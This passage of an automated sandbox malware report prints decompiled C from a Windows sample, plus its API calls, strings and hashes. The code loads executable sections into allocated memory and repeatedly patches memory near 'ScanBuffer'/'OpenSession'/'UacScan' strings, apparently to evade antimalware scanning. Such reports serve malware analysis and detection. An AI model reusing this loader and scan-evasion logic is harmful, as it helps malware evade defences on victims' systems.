				_pop(_t1028); // executed
				E02733690(_v120, 0x2744598, _t1028, _t1192); // executed
				E02724A98( &_v128, "kernel32");
				_t462 = E0272CAC8(_v128, 0x2744598, 0x8000); // executed
				 *0x27445ac = _t462;
				_t463 =  *0x27445ac; // 0x74ca0000
				 *0x274459c = GetProcAddress(_t463, "VirtualAlloc");
				_t465 =  *0x27445ac; // 0x74ca0000
				FreeLibrary(_t465);
				_t467 =  *0x274451c; // 0x4984ba8
				_t69 = _t467 + 0x54; // 0x200
				_t469 =  *0x2744538; // 0x10410000
				_t470 = VirtualAlloc(_t469,  *_t69, 0x1000, 4); // executed
				 *0x2744548 = _t470;
				_push(0x27376c4);
				_push( *0x2744598);
				_push("UacScan");
				E02724C24();
				E02724A98( &_v132, E02724D64(_v136));
				_push(_v132);
				E02724BB0( &_v144,  *0x2744598, 0x27376c4);
				E02724A98( &_v140, E02724D64(_v144));
				_pop(_t1035); // executed
				E02733690(_v140, 0x2744598, _t1035, _t1192);
				_t485 =  *0x274451c; // 0x4984ba8
				_t78 = _t485 + 0x54; // 0x200
				_t1036 =  *0x2744548; // 0x10411000
				E02735DF0(_v12,  *_t78, _t1036);
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v148, E02724D64(_v152));
				_push(_v148);
				E02724BB0( &_v160,  *0x2744598, 0x27376c4);
				E02724A98( &_v156, E02724D64(_v160));
				_pop(_t1041); // executed
				E02733690(_v156, 0x2744598, _t1041, _t1192); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v164, E02724D64(_v168));
				_push(_v164);
				E02724BB0( &_v176,  *0x2744598, 0x27376c4);
				E02724A98( &_v172, E02724D64(_v176));
				_pop(_t1046); // executed
				E02733690(_v172, 0x2744598, _t1046, _t1192); // executed
				 *0x27445ac = LoadLibraryA("kernel32");
				_t517 =  *0x27445ac; // 0x74ca0000
				 *0x27445a0 = GetProcAddress(_t517, "VirtualProtect");
				_t519 =  *0x274451c; // 0x4984ba8
				_t96 = _t519 + 0x54; // 0x200
				_t521 =  *0x2744548; // 0x10411000
				VirtualProtect(_t521,  *_t96, 2, 0x2744554);
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v180, E02724D64(_v184));
				_push(_v180);
				E02724BB0( &_v192,  *0x2744598, 0x27376c4);
				E02724A98( &_v188, E02724D64(_v192));
				_pop(_t1051); // executed
				E02733690(_v188, 0x2744598, _t1051, _t1192); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v196, E02724D64(_v200));
				_push(_v196);
				E02724BB0( &_v208,  *0x2744598, 0x27376c4);
				E02724A98( &_v204, E02724D64(_v208));
				_pop(_t1056); // executed
				E02733690(_v204, 0x2744598, _t1056, _t1192);
				_t551 =  *0x274451c; // 0x4984ba8
				_t1057 =  *0x274451c; // 0x4984ba8
				_t113 = _t1057 + 0x14; // 0x10200e0
				 *0x2744540 = _t551 + 0x18 + ( *_t113 & 0x0000ffff);
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v212, E02724D64(_v216));
				_push(_v212);
				E02724BB0( &_v224,  *0x2744598, 0x27376c4);
				E02724A98( &_v220, E02724D64(_v224));
				_pop(_t1063); // executed
				E02733690(_v220, 0x2744598, _t1063, _t1192); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v228, E02724D64(_v232));
				_push(_v228);
				E02724BB0( &_v240,  *0x2744598, 0x27376c4);
				E02724A98( &_v236, E02724D64(_v240));
				_pop(_t1068); // executed
				E02733690(_v236, 0x2744598, _t1068, _t1192);
				_t582 =  *0x274451c; // 0x4984ba8
				_t130 = _t582 + 6; // 0x1fcb0001
				_t1194 = ( *_t130 & 0x0000ffff) - 1;
				if(_t1194 >= 0) {
					_t1198 = _t1194 + 1;
					 *0x2744544 = 0;
					do {
						_push(0x27376c4);
						_push( *0x2744598);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v244, E02724D64(_v248));
						_push(_v244);
						E02724BB0( &_v256,  *0x2744598, 0x27376c4);
						E02724A98( &_v252, E02724D64(_v256));
						_pop(_t1146); // executed
						E02733690(_v252, 0x2744598, _t1146, _t1198); // executed
						_push(0x27376c4);
						_push( *0x2744598);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v260, E02724D64(_v264));
						_push(_v260);
						E02724BB0( &_v272,  *0x2744598, 0x27376c4);
						E02724A98( &_v268, E02724D64(_v272));
						_pop(_t1151); // executed
						E02733690(_v268, 0x2744598, _t1151, _t1198); // executed
						_t837 =  *0x2744544 +  *0x2744544 * 4;
						_t1152 =  *0x2744540; // 0x4984ca0
						_t150 = _t837 * 8; // 0x2d138
						 *0x274454c =  *(_t1152 + _t150 + 8);
						_t1154 =  *0x2744540; // 0x4984ca0
						_t153 = _t837 * 8; // 0x2d200
						 *0x2744550 =  *(_t1154 + _t153 + 0x10);
						_t839 =  *0x274454c; // 0x2d200
						_t1208 = _t839 -  *0x2744550; // 0x2d138
						if(_t1208 < 0) {
							_push(0x27376c4);
							_push( *0x2744598);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v276, E02724D64(_v280));
							_push(_v276);
							E02724BB0( &_v288,  *0x2744598, 0x27376c4);
							E02724A98( &_v284, E02724D64(_v288));
							_pop(_t1183); // executed
							E02733690(_v284, 0x2744598, _t1183, _t1198); // executed
							_push(0x27376c4);
							_push( *0x2744598);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v292, E02724D64(_v296));
							_push(_v292);
							E02724BB0( &_v304,  *0x2744598, 0x27376c4);
							E02724A98( &_v300, E02724D64(_v304));
							_pop(_t1188); // executed
							E02733690(_v300, 0x2744598, _t1188, _t1198);
							_t937 =  *0x2744550; // 0x2d138
							 *0x274454c =  *0x274454c ^ _t937;
							_t938 =  *0x274454c; // 0x2d200
							 *0x2744550 =  *0x2744550 ^ _t938;
							_t939 =  *0x2744550; // 0x2d138
							 *0x274454c =  *0x274454c ^ _t939;
						}
						_push(0x27376c4);
						_push( *0x2744598);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v308, E02724D64(_v312));
						_push(_v308);
						E02724BB0( &_v320,  *0x2744598, 0x27376c4);
						E02724A98( &_v316, E02724D64(_v320));
						_pop(_t1159); // executed
						E02733690(_v316, 0x2744598, _t1159, _t1198); // executed
						_push(0x27376c4);
						_push( *0x2744598);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v324, E02724D64(_v328));
						_push(_v324);
						E02724BB0( &_v336,  *0x2744598, 0x27376c4);
						E02724A98( &_v332, E02724D64(_v336));
						_pop(_t1164); // executed
						E02733690(_v332, 0x2744598, _t1164, _t1198); // executed
						_t868 =  *0x274454c; // 0x2d200
						_t870 =  *0x2744544 +  *0x2744544 * 4;
						_t1165 =  *0x2744540; // 0x4984ca0
						_t190 = _t870 * 8; // 0x1000
						_t873 = VirtualAlloc( *((intOrPtr*)(_t1165 + _t190 + 0xc)) +  *0x2744538, _t868, 0x1000, 4); // executed
						 *0x2744548 = _t873;
						_t874 =  *0x2744548; // 0x10411000
						_t1166 =  *0x274454c; // 0x2d200
						E02723518(_t874, _t1166);
						_push(0x27376c4);
						_push( *0x2744598);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v340, E02724D64(_v344));
						_push(_v340);
						E02724BB0( &_v352,  *0x2744598, 0x27376c4);
						E02724A98( &_v348, E02724D64(_v352));
						_pop(_t1171); // executed
						E02733690(_v348, 0x2744598, _t1171, _t1198); // executed
						_push(0x27376c4);
						_push( *0x2744598);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v356, E02724D64(_v360));
						_push(_v356);
						E02724BB0( &_v368,  *0x2744598, 0x27376c4);
						E02724A98( &_v364, E02724D64(_v368));
						_pop(_t1176); // executed
						E02733690(_v364, 0x2744598, _t1176, _t1198); // executed
						_t905 =  *0x2744544 +  *0x2744544 * 4;
						_t1177 =  *0x2744540; // 0x4984ca0
						_t211 = _t905 * 8; // 0x1000
						_t1178 =  *0x2744548; // 0x10411000
						_t987 =  *0x2744550; // 0x2d138
						E02735DF0( *((intOrPtr*)(_t1177 + _t211 + 0x14)) + _v12, _t987, _t1178);
						 *0x2744544 =  *0x2744544 + 1;
						_t1198 = _t1198 - 1;
					} while (_t1198 != 0);
				}
				_push(0x27376c4);
				_push( *0x2744598);
				_push(0x2737734);
				_push(0x2737740);
				_push(0x273774c);
				_push(0x2737758);
				_push( *0x2744598);
				_push(0x2737764);
				_push(0x2737770);
				E02724C24();
				E02724A98( &_v372, E02724D64(_v376));
				_push(_v372);
				E02724BB0( &_v384,  *0x2744598, 0x27376c4);
				E02724A98( &_v380, E02724D64(_v384));
				_pop(_t1073); // executed
				E02733690(_v380, 0x2744598, _t1073, _t1194);
				_t597 =  *0x274451c; // 0x4984ba8
				_t222 = _t597 + 0x28; // 0x12b0
				 *0x2744560 =  *_t222 +  *0x2744538;
				_push(0x27376c4);
				_push( *0x2744598);
				_push(0x2737734);
				_push(0x2737740);
				_push(0x273774c);
				_push(0x2737758);
				_push( *0x2744598);
				_push(0x2737764);
				_push(0x2737770);
				E02724C24();
				E02724A98( &_v388, E02724D64(_v392));
				_push(_v388);
				E02724BB0( &_v400,  *0x2744598, 0x27376c4);
				E02724A98( &_v396, E02724D64(_v400));
				_pop(_t1078); // executed
				E02733690(_v396, 0x2744598, _t1078, _t1194);
				_t614 =  *0x274451c; // 0x4984ba8
				_t231 = _t614 + 0x28; // 0x12b0
				 *0x2744564 =  *_t231 +  *0x2744538;
				_push(0x27376c4);
				_push( *0x2744598);
				_push(0x2737734);
				_push(0x2737740);
				_push(0x273774c);
				_push(0x2737758);
				_push( *0x2744598);
				_push(0x2737764);
				_push(0x2737770);
				E02724C24();
				E02724A98( &_v404, E02724D64(_v408));
				_push(_v404);
				E02724BB0( &_v416,  *0x2744598, 0x27376c4);
				E02724A98( &_v412, E02724D64(_v416));
				_pop(_t1083); // executed
				E02733690(_v412, 0x2744598, _t1083, _t1194);
				_t631 =  *0x2744538; // 0x10410000
				 *0x2744558 = _t631;
				_push(0x27376c4);
				_push( *0x2744598);
				_push(0x2737734);
				_push(0x2737740);
				_push(0x273774c);
				_push(0x2737758);
				_push( *0x2744598);
				_push(0x2737764);
				_push(0x2737770);
				E02724C24();
				E02724A98( &_v420, E02724D64(_v424));
				_push(_v420);
				E02724BB0( &_v432,  *0x2744598, 0x27376c4);
				E02724A98( &_v428, E02724D64(_v432));
				_pop(_t1088); // executed
				E02733690(_v428, 0x2744598, _t1088, _t1194);
				_t646 =  *0x274451c; // 0x4984ba8
				_t248 = _t646 + 0x50; // 0x2f000
				 *0x274455c =  *_t248;
				_push(0x27376c4);
				_push( *0x2744598);
				_push(0x2737734);
				_push(0x2737740);
				_push(0x273774c);
				_push(0x2737758);
				_push( *0x2744598);
				_push(0x2737764);
				_push(0x2737770);
				E02724C24();
				E02724A98( &_v436, E02724D64(_v440));
				_push(_v436);
				E02724BB0( &_v448,  *0x2744598, 0x27376c4);
				E02724A98( &_v444, E02724D64(_v448));
				_pop(_t1093); // executed
				E02733690(_v444, 0x2744598, _t1093, _t1194); // executed
				_push(0);
				E02725A04();
				_t664 =  *0x274451c; // 0x4984ba8
				if( *((intOrPtr*)(_t664 + 0xa0)) != 0) {
					_push(0x27376c4);
					_push( *0x2744598);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v452, E02724D64(_v456));
					_push(_v452);
					E02724BB0( &_v464,  *0x2744598, 0x27376c4);
					E02724A98( &_v460, E02724D64(_v464));
					_pop(_t1141);
					E02733690(_v460, 0x2744598, _t1141, _t1194);
				}
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v468, E02724D64(_v472));
				_push(_v468);
				E02724BB0( &_v480,  *0x2744598, 0x27376c4);
				E02724A98( &_v476, E02724D64(_v480));
				_pop(_t1099); // executed
				E02733690(_v476, 0x2744598, _t1099, _t1194);
				_t679 =  *0x274451c; // 0x4984ba8
				_t274 = _t679 + 0xa0; // 0x0
				E02735E2C( *_t274 +  *0x2744538, _t1099);
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v484, E02724D64(_v488));
				_push(_v484);
				E02724BB0( &_v496,  *0x2744598, 0x27376c4);
				E02724A98( &_v492, E02724D64(_v496));
				_pop(_t1104); // executed
				E02733690(_v492, 0x2744598, _t1104, _t1194); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v500, E02724D64(_v504));
				_push(_v500);
				E02724BB0( &_v512,  *0x2744598, 0x27376c4);
				E02724A98( &_v508, E02724D64(_v512));
				_pop(_t1109); // executed
				E02733690(_v508, 0x2744598, _t1109, _t1194);
				_t711 =  *0x274451c; // 0x4984ba8
				if( *((intOrPtr*)(_t711 + 0x80)) != 0) {
					_t790 =  *0x274451c; // 0x4984ba8
					_t292 = _t790 + 0x80; // 0x0
					E02735F6C( *_t292 +  *0x2744538, 0x2744598, 0x2744544, _t1194, _t1200);
				}
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v516, E02724D64(_v520));
				_push(_v516);
				E02724BB0( &_v528,  *0x2744598, 0x27376c4);
				E02724A98( &_v524, E02724D64(_v528));
				_pop(_t1114); // executed
				E02733690(_v524, 0x2744598, _t1114, _t1194); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v532, E02724D64(_v536));
				_push(_v532);
				E02724BB0( &_v544,  *0x2744598, 0x27376c4);
				E02724A98( &_v540, E02724D64(_v544));
				_pop(_t1119); // executed
				E02733690(_v540, 0x2744598, _t1119, _t1194);
				_t740 =  *0x274451c; // 0x4984ba8
				_t309 = _t740 + 6; // 0x1fcb0001
				_t1196 = ( *_t309 & 0x0000ffff) - 1;
				if(_t1196 >= 0) {
					_t1197 = _t1196 + 1;
					 *0x2744544 = 0;
					do {
						_push(0x27376c4);
						_push( *0x2744598);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v548, E02724D64(_v552));
						_push(_v548);
						E02724BB0( &_v560,  *0x2744598, 0x27376c4);
						E02724A98( &_v556, E02724D64(_v560));
						_pop(_t1128); // executed
						E02733690(_v556, 0x2744598, _t1128, _t1197); // executed
						_push(0x27376c4);
						_push( *0x2744598);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v564, E02724D64(_v568));
						_push(_v564);
						E02724BB0( &_v576,  *0x2744598, 0x27376c4);
						E02724A98( &_v572, E02724D64(_v576));
						_pop(_t1133); // executed
						E02733690(_v572, 0x2744598, _t1133, _t1197); // executed
						_t777 =  *0x2744544 +  *0x2744544 * 4;
						_t1134 =  *0x2744540; // 0x4984ca0
						_t329 = _t777 * 8; // 0x60000020
						_t779 = E02735DD8( *((intOrPtr*)(_t1134 + _t329 + 0x24)));
						_t781 =  *0x2744544 +  *0x2744544 * 4;
						_t1135 =  *0x2744540; // 0x4984ca0
						_t334 = _t781 * 8; // 0x2d138
						_t784 =  *0x2744544 +  *0x2744544 * 4;
						_t1136 =  *0x2744540; // 0x4984ca0
						_t339 = _t784 * 8; // 0x1000
						VirtualProtect( *((intOrPtr*)(_t1136 + _t339 + 0xc)) +  *0x2744538,  *(_t1135 + _t334 + 8), _t779, 0x2744554);
						_t788 =  *0x27445ac; // 0x74ca0000
						FreeLibrary(_t788);
						 *0x2744544 =  *0x2744544 + 1;
						_t1197 = _t1197 - 1;
					} while (_t1197 != 0);
				}
				_t973 =  *0x2735930; // 0x2735934
				E027255FC(_a4, _t973, 0x2744558);
				_pop(_t1121);
				 *[fs:eax] = _t1121;
				_push(0x2737695);
				E027248C4( &_v576, 0x64);
				return E027248C4( &_v176, 0x29);
			}

0x02736388
0x02736389
0x0273638c
0x02736391
0x02736391
0x02736393
0x02736395
0x02736395
0x02736398
0x02736398
0x0273639b
0x0273639c
0x0273639e
0x027363a1
0x027363b0
0x027363b1
0x027363b6
0x027363b9
0x027363c1
0x027363c6
0x027363c7
0x027363ce
0x027363e5
0x027363d0
0x027363d7
0x027363d7
0x027363ea
0x027363ef
0x027363f1
0x027363fe
0x02736410
0x02736418
0x02736423
0x02736435
0x0273643d
0x0273643e
0x02736443
0x02736448
0x0273644a
0x02736457
0x02736469
0x02736471
0x0273647c
0x0273648e
0x02736496
0x02736497
0x027364a1
0x027364a2
0x027364a9
0x027364ad
0x027364b4
0x027364b9
0x027364be
0x027364c0
0x027364cd
0x027364df
0x027364e7
0x027364f2
0x02736504
0x0273650c
0x0273650d
0x02736512
0x02736517
0x02736519
0x02736526
0x02736538
0x02736540
0x0273654b
0x0273655d
0x02736565
0x02736566
0x02736572
0x02736577
0x0273657b
0x02736580
0x0273658a
0x0273658f
0x02736594
0x02736599
0x0273659b
0x027365a8
0x027365ba
0x027365c2
0x027365cd
0x027365df
0x027365e7
0x027365e8
0x027365ed
0x027365f2
0x027365f8
0x027365fb
0x02736601
0x02736606
0x02736608
0x02736615
0x02736627
0x0273662f
0x0273663a
0x0273664c
0x02736654
0x02736655
0x0273665a
0x0273665f
0x02736661
0x0273666e
0x02736680
0x02736688
0x02736693
0x027366a5
0x027366ad
0x027366ae
0x027366bb
0x027366c8
0x027366cd
0x027366d7
0x027366e2
0x027366e7
0x027366ed
0x027366f9
0x027366fe
0x02736702
0x02736708
0x0273670e
0x02736713
0x02736718
0x0273671a
0x0273672a
0x0273673f
0x02736747
0x02736755
0x0273676d
0x02736778
0x02736779
0x0273677e
0x02736783
0x02736786
0x0273678f
0x02736794
0x02736799
0x0273679b
0x027367ab
0x027367c3
0x027367ce
0x027367dc
0x027367f4
0x027367ff
0x02736800
0x02736805
0x0273680a
0x0273680c
0x0273681c
0x02736834
0x0273683f
0x0273684d
0x02736865
0x02736870
0x02736871
0x02736880
0x0273688a
0x02736895
0x027368a1
0x027368a6
0x027368aa
0x027368b0
0x027368b6
0x027368bb
0x027368bd
0x027368cd
0x027368e5
0x027368f0
0x027368fe
0x02736916
0x02736921
0x02736922
0x02736927
0x0273692c
0x0273692e
0x0273693e
0x02736956
0x02736961
0x0273696f
0x02736987
0x02736992
0x02736993
0x02736998
0x027369a0
0x027369a6
0x027369ac
0x027369b1
0x027369b6
0x027369b8
0x027369c8
0x027369e0
0x027369eb
0x027369f9
0x02736a11
0x02736a1c
0x02736a1d
0x02736a22
0x02736a27
0x02736a29
0x02736a39
0x02736a51
0x02736a5c
0x02736a6a
0x02736a82
0x02736a8d
0x02736a8e
0x02736a93
0x02736a98
0x02736a9c
0x02736a9f
0x02736aa5
0x02736aa6
0x02736aac
0x02736aac
0x02736ab1
0x02736ab3
0x02736ac3
0x02736adb
0x02736ae6
0x02736af4
0x02736b0c
0x02736b17
0x02736b18
0x02736b1d
0x02736b22
0x02736b24
0x02736b34
0x02736b4c
0x02736b57
0x02736b65
0x02736b7d
0x02736b88
0x02736b89
0x02736b90
0x02736b93
0x02736b99
0x02736b9d
0x02736ba3
0x02736ba9
0x02736bad
0x02736bb2
0x02736bb7
0x02736bbd
0x02736bc3
0x02736bc8
0x02736bca
0x02736bda
0x02736bf2
0x02736bfd
0x02736c0b
0x02736c23
0x02736c2e
0x02736c2f
0x02736c34
0x02736c39
0x02736c3b
0x02736c4b
0x02736c63
0x02736c6e
0x02736c7c
0x02736c94
0x02736c9f
0x02736ca0
0x02736ca5
0x02736caa
0x02736cb0
0x02736cb5
0x02736cbb
0x02736cc0
0x02736cc0
0x02736cc6
0x02736ccb
0x02736ccd
0x02736cdd
0x02736cf5
0x02736d00
0x02736d0e
0x02736d26
0x02736d31
0x02736d32
0x02736d37
0x02736d3c
0x02736d3e
0x02736d4e
0x02736d66
0x02736d71
0x02736d7f
0x02736d97
0x02736da2
0x02736da3
0x02736daf
0x02736db7
0x02736dba
0x02736dc0
0x02736dcb
0x02736dd0
0x02736dd5
0x02736ddc
0x02736de2
0x02736de7
0x02736dec
0x02736dee
0x02736dfe
0x02736e16
0x02736e21
0x02736e2f
0x02736e47
0x02736e52
0x02736e53
0x02736e58
0x02736e5d
0x02736e5f
0x02736e6f
0x02736e87
0x02736e92
0x02736ea0
0x02736eb8
0x02736ec3
0x02736ec4
0x02736ecb
0x02736ece
0x02736ed4
0x02736edb
0x02736ee1
0x02736ee7
0x02736eec
0x02736eee
0x02736eee
0x02736aac
0x02736ef5
0x02736efa
0x02736efc
0x02736f01
0x02736f06
0x02736f0b
0x02736f10
0x02736f12
0x02736f17
0x02736f27
0x02736f3f
0x02736f4a
0x02736f58
0x02736f70
0x02736f7b
0x02736f7c
0x02736f81
0x02736f86
0x02736f8f
0x02736f94
0x02736f99
0x02736f9b
0x02736fa0
0x02736fa5
0x02736faa
0x02736faf
0x02736fb1
0x02736fb6
0x02736fc6
0x02736fde
0x02736fe9
0x02736ff7
0x0273700f
0x0273701a
0x0273701b
0x02737020
0x02737025
0x0273702e
0x02737033
0x02737038
0x0273703a
0x0273703f
0x02737044
0x02737049
0x0273704e
0x02737050
0x02737055
0x02737065
0x0273707d
0x02737088
0x02737096
0x027370ae
0x027370b9
0x027370ba
0x027370bf
0x027370c4
0x027370c9
0x027370ce
0x027370d0
0x027370d5
0x027370da
0x027370df
0x027370e4
0x027370e6
0x027370eb
0x027370fb
0x02737113
0x0273711e
0x0273712c
0x02737144
0x0273714f
0x02737150
0x02737155
0x0273715a
0x0273715d
0x02737162
0x02737167
0x02737169
0x0273716e
0x02737173
0x02737178
0x0273717d
0x0273717f
0x02737184
0x02737194
0x027371ac
0x027371b7
0x027371c5
0x027371dd
0x027371e8
0x027371e9
0x027371ee
0x02737200
0x02737208
0x02737214
0x02737216
0x0273721b
0x0273721d
0x0273722d
0x02737245
0x02737250
0x0273725e
0x02737276
0x02737281
0x02737282
0x02737282
0x02737287
0x0273728c
0x0273728e
0x0273729e
0x027372b6
0x027372c1
0x027372cf
0x027372e7
0x027372f2
0x027372f3
0x027372f8
0x027372fd
0x02737309
0x0273730e
0x02737313
0x02737315
0x02737325
0x0273733d
0x02737348
0x02737356
0x0273736e
0x02737379
0x0273737a
0x0273737f
0x02737384
0x02737386
0x02737396
0x027373ae
0x027373b9
0x027373c7
0x027373df
0x027373ea
0x027373eb
0x027373f0
0x027373fc
0x027373ff
0x02737404
0x02737410
0x02737415
0x02737416
0x0273741b
0x0273741d
0x0273742d
0x02737445
0x02737450
0x0273745e
0x02737476
0x02737481
0x02737482
0x02737487
0x0273748c
0x0273748e
0x0273749e
0x027374b6
0x027374c1
0x027374cf
0x027374e7
0x027374f2
0x027374f3
0x027374f8
0x027374fd
0x02737501
0x02737504
0x0273750a
0x0273750b
0x02737511
0x02737511
0x02737516
0x02737518
0x02737528
0x02737540
0x0273754b
0x02737559
0x02737571
0x0273757c
0x0273757d
0x02737582
0x02737587
0x02737589
0x02737599
0x027375b1
0x027375bc
0x027375ca
0x027375e2
0x027375ed
0x027375ee
0x027375fa
0x027375fd
0x02737603
0x02737607
0x0273760f
0x02737612
0x02737618
0x0273761f
0x02737622
0x02737628
0x02737633
0x02737639
0x0273763f
0x02737644
0x02737646
0x02737646
0x02737511
0x02737655
0x0273765b
0x02737662
0x02737665
0x02737668
0x02737678
0x0273768d

APIs

InetIsOffline.URL(00000000,00000000,0273768E,?,?,?,?,00000000,00000000), ref: 027363C7

Part of subcall function 02733690: LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
Part of subcall function 02733690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
Part of subcall function 02733690: GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
Part of subcall function 02733690: RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
Part of subcall function 02733690: GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
Part of subcall function 02733690: NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
Part of subcall function 02733690: FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

VirtualAlloc.KERNEL32(-02344524,0002F000,00003000,00000040,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4), ref: 0273658A

Part of subcall function 0272CAC8: SetErrorMode.KERNEL32 ref: 0272CAD2
Part of subcall function 0272CAC8: LoadLibraryA.KERNEL32(00000000,00000000,0272CB1C,?,00000000,0272CB3A), ref: 0272CB01

GetProcAddress.KERNEL32(74CA0000,VirtualAlloc), ref: 027366DD
FreeLibrary.KERNEL32(74CA0000,74CA0000,VirtualAlloc,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4,UacScan,02744598,027376C4,-02344524,0002F000,00003000,00000040), ref: 027366ED
VirtualAlloc.KERNEL32(10410000,00000200,00001000,00000004,74CA0000,74CA0000,VirtualAlloc,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4,UacScan,02744598,027376C4), ref: 02736708
LoadLibraryA.KERNEL32(kernel32,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4,UacScan,02744598,027376C4), ref: 0273687B
GetProcAddress.KERNEL32(74CA0000,VirtualProtect), ref: 02736890
VirtualProtect.KERNEL32(10411000,00000200,00000002,02744554,74CA0000,VirtualProtect,kernel32,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4,UacScan,02744598,027376C4), ref: 027368B0
VirtualAlloc.KERNEL32(-02743538,0002D200,00001000,00000004,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4,OpenSession,02744598,027376C4,ScanBuffer,02744598,027376C4), ref: 02736DCB

Part of subcall function 02735F6C: InetIsOffline.URL(00000000,00000000,02736329,?,?,?,?,0000000C,00000000,00000000), ref: 02735FA4

VirtualProtect.KERNEL32(-02743538,0002D138,00000000,02744554,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4,ScanBuffer,02744598,027376C4,OpenSession,02744598,027376C4), ref: 02737633
FreeLibrary.KERNEL32(74CA0000), ref: 0273763F

Strings

teSe, xrefs: 027363D2
UacScan, xrefs: 0273659B, 0273671A
VirtualProtect, xrefs: 02736885
VirtualAlloc, xrefs: 027366D2
ScanBuffer, xrefs: 0273644A, 02736519, 02736661, 0273680C, 0273692E, 027369B8, 02736AB3, 02736BCA, 02736D3E, 02736E5F, 0273728E, 02737386, 0273748E, 02737589
OpenSession, xrefs: 027363F1, 027364C0, 02736608, 0273679B, 027368BD, 02736A29, 02736B24, 02736C3B, 02736CCD, 02736DEE, 0273721D, 02737315, 0273741D, 02737518
kernel32, xrefs: 027366B6, 02736876

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: LibraryVirtual$AddressAllocFreeLoadProc$InetMemoryOfflineProtect$CurrentErrorFlushHandleModeModuleMoveProcess
String ID: OpenSession$ScanBuffer$UacScan$VirtualAlloc$VirtualProtect$kernel32$teSe
API String ID: 3418975139-2221745942
Opcode ID: 7d8722ca3215dd2e58caf22de6ccb16ff8a9846d93d08c53dff803021c63da93
Instruction ID: acbc865c42bb267221aa3aaba5eaa2f6e87459ec8ba3d2d8434acd88fc9357aa
Opcode Fuzzy Hash: 7d8722ca3215dd2e58caf22de6ccb16ff8a9846d93d08c53dff803021c63da93
Instruction Fuzzy Hash: C2B23874A00529DBDB23EB68DCA4BDEB7B6EF45300F1084E6E105AB215DB30AE49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0273779C Relevance: 32.3, APIs: 10, Strings: 8, Instructions: 773
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0273779C(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v9;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				char _v272;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v288;
				char _v292;
				char _v296;
				intOrPtr _v300;
				char _v304;
				char _v308;
				char _v312;
				intOrPtr _v316;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
